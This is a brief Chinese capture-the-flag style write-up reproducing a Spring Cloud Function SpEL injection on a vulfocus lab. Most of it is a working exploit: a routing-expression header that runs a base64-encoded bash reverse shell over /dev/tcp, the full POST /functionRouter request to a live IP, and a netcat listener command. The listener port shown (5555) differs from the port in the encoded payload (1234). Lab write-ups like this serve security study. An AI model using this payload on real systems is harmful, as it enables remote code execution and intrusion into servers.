文章目录
1、复现环境
本文是在vulfocus在线环境进行的复现:http://vulfocus.io/
2、构造poc
由描述可知需要构造请求包,添加spring.cloud.function.routing-expression参数,内容会被作为spel表达式解析
由于java中不支持管道符和特殊符号,所以将反弹shell的命令用base64进行编码处理
spring.cloud.function.routing-expression:
T(java.lang.Runtime).getRuntime().exec("bash -c
{echo,YmFzaCAtaSA+Ji9kZXYvdGNwL3h4Lnh4Lnh4Lnh4LzEyMzQgMD4mMQ==}|
{base64,-d}|{bash,-i}")
完整poc:
POST /functionRouter HTTP/1.1
Host: 123.58.236.76:40427
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
spring.cloud.function.routing-expression:
T(java.lang.Runtime).getRuntime().exec("bash -c
{echo,YmFzaCAtaSA+Ji9kZXYvdGNwL3h4Lnh4Lnh4Lnh4LzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}")
Connection: close
Content-Length: 4
test
3、在vps上开启监听
nc -lvvp 5555
4、执行poc,成功反弹shell
查看flag